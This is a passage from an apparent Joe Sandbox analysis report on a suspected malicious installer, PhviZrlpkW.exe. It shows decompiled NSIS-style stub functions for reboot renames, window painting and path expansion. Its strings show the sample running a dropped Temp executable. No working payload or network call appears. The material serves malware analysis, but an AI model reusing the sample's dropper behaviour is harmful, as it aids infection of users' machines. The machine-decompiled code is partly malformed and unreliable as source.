                    						if(_t48 != 0xffffffff) {
                    							_t42 = GetFileSize(_t48, 0);
                    							_t6 = _t37 + 0xa; // 0xa
                    							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                    							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                    								L18:
                    								return CloseHandle(_t48);
                    							} else {
                    								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                    									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                    									if(_t49 == 0) {
                    										_t48 =  *(_t53 + 0x18);
                    										L16:
                    										_t24 = _t42;
                    										L17:
                    										E00406113(_t24 + _t46, 0x4269e8, _t37);
                    										SetFilePointer(_t48, 0, 0, 0);
                    										E0040620A(_t48, _t46, _t42 + _t37);
                    										GlobalFree(_t46);
                    										goto L18;
                    									}
                    									_t39 = _t46 + _t42;
                    									_t31 = _t39 + _t37;
                    									while(_t39 > _t49) {
                    										 *_t31 =  *_t39;
                    										_t31 = _t31 - 1;
                    										_t39 = _t39 - 1;
                    									}
                    									_t24 = _t49 - _t46 + 1;
                    									_t48 =  *(_t53 + 0x18);
                    									goto L17;
                    								}
                    								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                    								_t42 = _t42 + 0xa;
                    								goto L16;
                    							}
                    						}
                    					}
                    				} else {
                    					CloseHandle(E00406158(_t44, 0, 1));
                    					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                    					if(_t12 != 0 && _t12 <= 0x400) {
                    						goto L3;
                    					}
                    				}
                    				return _t12;
                    			}




















                    APIs
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                    • GetShortPathNameW.KERNEL32 ref: 004062F2
                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                    • GetShortPathNameW.KERNEL32 ref: 0040630F
                    • wsprintfA.USER32 ref: 0040632D
                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                    • GlobalFree.KERNEL32 ref: 00406416
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PhviZrlpkW.exe,80000000,00000003), ref: 0040615C
                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                    • String ID: %ls=%ls$[Rename]$mB$uB$uB
                    • API String ID: 2171350718-2295842750
                    • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                    • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                    • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                    • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                    				struct tagLOGBRUSH _v16;
                    				struct tagRECT _v32;
                    				struct tagPAINTSTRUCT _v96;
                    				struct HDC__* _t70;
                    				struct HBRUSH__* _t87;
                    				struct HFONT__* _t94;
                    				long _t102;
                    				signed int _t126;
                    				struct HDC__* _t128;
                    				intOrPtr _t130;
                    
                    				if(_a8 == 0xf) {
                    					_t130 =  *0x42a270;
                    					_t70 = BeginPaint(_a4,  &_v96);
                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                    					_a8 = _t70;
                    					GetClientRect(_a4,  &_v32);
                    					_t126 = _v32.bottom;
                    					_v32.bottom = _v32.bottom & 0x00000000;
                    					while(_v32.top < _t126) {
                    						_a12 = _t126 - _v32.top;
                    						asm("cdq");
                    						asm("cdq");
                    						asm("cdq");
                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                    						_t87 = CreateBrushIndirect( &_v16);
                    						_v32.bottom = _v32.bottom + 4;
                    						_a16 = _t87;
                    						FillRect(_a8,  &_v32, _t87);
                    						DeleteObject(_a16);
                    						_v32.top = _v32.top + 4;
                    					}
                    					if( *(_t130 + 0x58) != 0xffffffff) {
                    						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                    						_a16 = _t94;
                    						if(_t94 != 0) {
                    							_t128 = _a8;
                    							_v32.left = 0x10;
                    							_v32.top = 8;
                    							SetBkMode(_t128, 1);
                    							SetTextColor(_t128,  *(_t130 + 0x58));
                    							_a8 = SelectObject(_t128, _a16);
                    							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                    							SelectObject(_t128, _a8);
                    							DeleteObject(_a16);
                    						}
                    					}
                    					EndPaint(_a4,  &_v96);
                    					return 0;
                    				}
                    				_t102 = _a16;
                    				if(_a8 == 0x46) {
                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                    					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                    				}
                    				return DefWindowProcW(_a4, _a8, _a12, _t102);
                    			}














                    APIs
                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F
                    • API String ID: 941294808-1304234792
                    • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                    • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                    • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                    • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                    				struct _ITEMIDLIST* _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _t44;
                    				WCHAR* _t45;
                    				signed char _t47;
                    				signed int _t48;
                    				short _t59;
                    				short _t61;
                    				short _t63;
                    				void* _t71;
                    				signed int _t77;
                    				signed int _t78;
                    				short _t81;
                    				short _t82;
                    				signed char _t84;
                    				signed int _t85;
                    				void* _t98;
                    				void* _t104;
                    				intOrPtr* _t105;
                    				void* _t107;
                    				WCHAR* _t108;
                    				void* _t110;
                    
                    				_t107 = __esi;
                    				_t104 = __edi;
                    				_t71 = __ebx;
                    				_t44 = _a8;
                    				if(_t44 < 0) {
                    					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                    				}
                    				_push(_t71);
                    				_push(_t107);
                    				_push(_t104);
                    				_t105 =  *0x42a298 + _t44 * 2;
                    				_t45 = 0x428200;
                    				_t108 = 0x428200;
                    				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                    					_t108 = _a4;
                    					_a4 = _a4 & 0x00000000;
                    				}
                    				_t81 =  *_t105;
                    				_a8 = _t81;
                    				if(_t81 == 0) {
                    					L43:
                    					 *_t108 =  *_t108 & 0x00000000;
                    					if(_a4 == 0) {
                    						return _t45;
                    					}
                    					return E00406668(_a4, _t45);
                    				} else {
                    					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                    						_t98 = 2;
                    						_t105 = _t105 + _t98;
                    						if(_t81 >= 4) {
                    							if(__eflags != 0) {
                    								 *_t108 = _t81;
                    								_t108 = _t108 + _t98;
                    								__eflags = _t108;
                    							} else {
                    								 *_t108 =  *_t105;
                    								_t108 = _t108 + _t98;
                    								_t105 = _t105 + _t98;
                    							}
                    							L42:
                    							_t82 =  *_t105;
                    							_a8 = _t82;
                    							if(_t82 != 0) {
                    								_t81 = _a8;
                    								continue;
                    							}
                    							goto L43;
                    						}
                    						_t84 =  *((intOrPtr*)(_t105 + 1));
                    						_t47 =  *_t105;
                    						_t48 = _t47 & 0x000000ff;
                    						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                    						_t85 = _t84 & 0x000000ff;
                    						_v28 = _t48 | 0x00008000;
                    						_t77 = 2;
                    						_v16 = _t85;
                    						_t105 = _t105 + _t77;
                    						_v24 = _t48;
                    						_v20 = _t85 | 0x00008000;
                    						if(_a8 != _t77) {
                    							__eflags = _a8 - 3;
                    							if(_a8 != 3) {
                    								__eflags = _a8 - 1;
                    								if(__eflags == 0) {
                    									__eflags = (_t48 | 0xffffffff) - _v12;
                    									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                    								}
                    								L38:
                    								_t108 =  &(_t108[lstrlenW(_t108)]);
                    								_t45 = 0x428200;
                    								goto L42;
                    							}
                    							_t78 = _v12;
                    							__eflags = _t78 - 0x1d;
                    							if(_t78 != 0x1d) {
                    								__eflags = (_t78 << 0xb) + 0x42b000;
                    								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                    							} else {
                    								E004065AF(_t108,  *0x42a268);
                    							}
                    							__eflags = _t78 + 0xffffffeb - 7;
                    							if(__eflags < 0) {
                    								L29:
                    								E004068EF(_t108);
                    							}
                    							goto L38;
                    						}
                    						if( *0x42a2e4 != 0) {
                    							_t77 = 4;
                    						}
                    						_t121 = _t48;
                    						if(_t48 >= 0) {
                    							__eflags = _t48 - 0x25;
                    							if(_t48 != 0x25) {
                    								__eflags = _t48 - 0x24;
                    								if(_t48 == 0x24) {
                    									GetWindowsDirectoryW(_t108, 0x400);
                    									_t77 = 0;
                    								}
                    								while(1) {
                    									__eflags = _t77;
                    									if(_t77 == 0) {
                    										goto L26;
                    									}
                    									_t59 =  *0x42a264;
                    									_t77 = _t77 - 1;
                    									__eflags = _t59;
                    									if(_t59 == 0) {
                    										L22:
                    										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                    										__eflags = _t61;
                    										if(_t61 != 0) {
                    											L24:
                    											 *_t108 =  *_t108 & 0x00000000;
                    											__eflags =  *_t108;
                    											continue;
                    										}
                    										__imp__SHGetPathFromIDListW(_v8, _t108);
                    										_a8 = _t61;
                    										__imp__CoTaskMemFree(_v8);
                    										__eflags = _a8;
                    										if(_a8 != 0) {
                    											goto L26;
                    										}
                    										goto L24;
                    									}
                    									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                    									__eflags = _t63;
                    									if(_t63 == 0) {
                    										goto L26;
                    									}
                    									goto L22;
                    								}
                    								goto L26;
                    							}
                    							GetSystemDirectoryW(_t108, 0x400);
                    							goto L26;
                    						} else {
                    							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                    							if( *_t108 != 0) {
                    								L27:
                    								if(_v16 == 0x1a) {
                    									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                    								}
                    								goto L29;
                    							}
                    							E004066A5(_t77, _t105, _t108, _t108, _v16);
                    							L26:
                    							if( *_t108 == 0) {
                    								goto L29;
                    							}
                    							goto L27;
                    						}
                    					}
                    					goto L43;
                    				}
                    			}






























                    APIs
                    • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000400), ref: 004067C0
                    • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                    • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Directory$SystemWindowslstrcatlstrlen
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                    • API String ID: 4260037668-1655364312
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004056CA(signed int _a4, WCHAR* _a8) {
                    				struct HWND__* _v8;
                    				signed int _v12;
                    				WCHAR* _v32;
                    				long _v44;
                    				int _v48;
                    				void* _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				WCHAR* _t27;
                    				signed int _t28;
                    				long _t29;
                    				signed int _t37;
                    				signed int _t38;
                    
                    				_t27 =  *0x429244;
                    				_v8 = _t27;
                    				if(_t27 != 0) {
                    					_t37 =  *0x42a314;
                    					_v12 = _t37;
                    					_t38 = _t37 & 0x00000001;
                    					if(_t38 == 0) {
                    						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                    					}
                    					_t27 = lstrlenW(0x422728);
                    					_a4 = _t27;
                    					if(_a8 == 0) {
                    						L6:
                    						if((_v12 & 0x00000004) == 0) {
                    							_t27 = SetWindowTextW( *0x429228, 0x422728);
                    						}
                    						if((_v12 & 0x00000002) == 0) {
                    							_v32 = 0x422728;
                    							_v52 = 1;
                    							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                    							_v44 = 0;
                    							_v48 = _t29 - _t38;
                    							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                    							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                    						}
                    						if(_t38 != 0) {
                    							_t28 = _a4;
                    							0x422728[_t28] = 0;
                    							return _t28;
                    						}
                    					} else {
                    						_t27 = lstrlenW(_a8) + _a4;
                    						if(_t27 < 0x1000) {
                    							_t27 = lstrcatW(0x422728, _a8);
                    							goto L6;
                    						}
                    					}
                    				}
                    				return _t27;
                    			}


















                    APIs
                    • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                    • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                    • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                    • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                    • String ID: ('B
                    • API String ID: 1495540970-2332581011
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                    				struct tagLOGBRUSH _v16;
                    				long _t39;
                    				long _t41;
                    				void* _t44;
                    				signed char _t50;
                    				long* _t54;
                    
                    				if(_a4 + 0xfffffecd > 5) {
                    					L18:
                    					return 0;
                    				}
                    				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                    				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                    					goto L18;
                    				} else {
                    					_t50 = _t54[5];
                    					if((_t50 & 0xffffffe0) != 0) {
                    						goto L18;
                    					}
                    					_t39 =  *_t54;
                    					if((_t50 & 0x00000002) != 0) {
                    						_t39 = GetSysColor(_t39);
                    					}
                    					if((_t54[5] & 0x00000001) != 0) {
                    						SetTextColor(_a8, _t39);
                    					}
                    					SetBkMode(_a8, _t54[4]);
                    					_t41 = _t54[1];
                    					_v16.lbColor = _t41;
                    					if((_t54[5] & 0x00000008) != 0) {
                    						_t41 = GetSysColor(_t41);
                    						_v16.lbColor = _t41;
                    					}
                    					if((_t54[5] & 0x00000004) != 0) {
                    						SetBkColor(_a8, _t41);
                    					}
                    					if((_t54[5] & 0x00000010) != 0) {
                    						_v16.lbStyle = _t54[2];
                    						_t44 = _t54[3];
                    						if(_t44 != 0) {
                    							DeleteObject(_t44);
                    						}
                    						_t54[3] = CreateBrushIndirect( &_v16);
                    					}
                    					return _t54[3];
                    				}
                    			}










                    APIs
                    • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                    • GetSysColor.USER32(00000000), ref: 00404686
                    • SetTextColor.GDI32(?,00000000), ref: 00404692
                    • SetBkMode.GDI32(?,?), ref: 0040469E
                    • GetSysColor.USER32(?), ref: 004046B1
                    • SetBkColor.GDI32(?,?), ref: 004046C1
                    • DeleteObject.GDI32(?), ref: 004046DB
                    • CreateBrushIndirect.GDI32(?), ref: 004046E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t72;
                    				void* _t76;
                    				void* _t79;
                    
                    				_t72 = __edx;
                    				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                    				_t65 = 2;
                    				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                    				_t66 = E00402D84(_t65);
                    				_t79 = _t66 - 1;
                    				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                    				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                    				if(_t79 < 0) {
                    					L36:
                    					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                    				} else {
                    					__ecx = 0x3ff;
                    					if(__eax > 0x3ff) {
                    						 *(__ebp - 0x44) = 0x3ff;
                    					}
                    					if( *__edi == __bx) {
                    						L34:
                    						__ecx =  *(__ebp - 0xc);
                    						__eax =  *(__ebp - 8);
                    						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                    						if(_t79 == 0) {
                    							 *(_t76 - 4) = 1;
                    						}
                    						goto L36;
                    					} else {
                    						 *(__ebp - 0x38) = __ebx;
                    						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                    						if( *(__ebp - 0x44) > __ebx) {
                    							do {
                    								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                    									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                    										__eax = __ebp - 0x50;
                    										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                    											goto L34;
                    										} else {
                    											goto L21;
                    										}
                    									} else {
                    										goto L34;
                    									}
                    								} else {
                    									__eax = __ebp - 0x40;
                    									_push(__ebx);
                    									_push(__ebp - 0x40);
                    									__eax = 2;
                    									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                    									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                    									if(__eax == 0) {
                    										goto L34;
                    									} else {
                    										__ecx =  *(__ebp - 0x40);
                    										if(__ecx == __ebx) {
                    											goto L34;
                    										} else {
                    											__ax =  *(__ebp + 0xa) & 0x000000ff;
                    											 *(__ebp - 0x4c) = __ecx;
                    											 *(__ebp - 0x50) = __eax;
                    											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                    												L28:
                    												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                    											} else {
                    												__ebp - 0x50 = __ebp + 0xa;
                    												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                    													L21:
                    													__eax =  *(__ebp - 0x50);
                    												} else {
                    													__edi =  *(__ebp - 0x4c);
                    													__edi =  ~( *(__ebp - 0x4c));
                    													while(1) {
                    														_t22 = __ebp - 0x40;
                    														 *_t22 =  *(__ebp - 0x40) - 1;
                    														__eax = 0xfffd;
                    														 *(__ebp - 0x50) = 0xfffd;
                    														if( *_t22 == 0) {
                    															goto L22;
                    														}
                    														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                    														__edi = __edi + 1;
                    														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                    														__eax = __ebp + 0xa;
                    														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                    															continue;
                    														} else {
                    															goto L21;
                    														}
                    														goto L22;
                    													}
                    												}
                    												L22:
                    												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                    													goto L28;
                    												} else {
                    													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                    														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                    															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                    															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                    														} else {
                    															__ecx =  *(__ebp - 0xc);
                    															__edx =  *(__ebp - 8);
                    															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                    															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                    														}
                    														goto L34;
                    													} else {
                    														__ecx =  *(__ebp - 0xc);
                    														__edx =  *(__ebp - 8);
                    														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                    														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                    														 *(__ebp - 0x38) = __eax;
                    														if(__ax == __bx) {
                    															goto L34;
                    														} else {
                    															goto L26;
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								goto L37;
                    								L26:
                    								__eax =  *(__ebp - 8);
                    							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                    						}
                    						goto L34;
                    					}
                    				}
                    				L37:
                    				return 0;
                    			}









                    APIs
                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                      • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$Pointer$ByteCharMultiWide$Read
                    • String ID: 9
                    • API String ID: 163830602-2366072709
                    • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                    • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
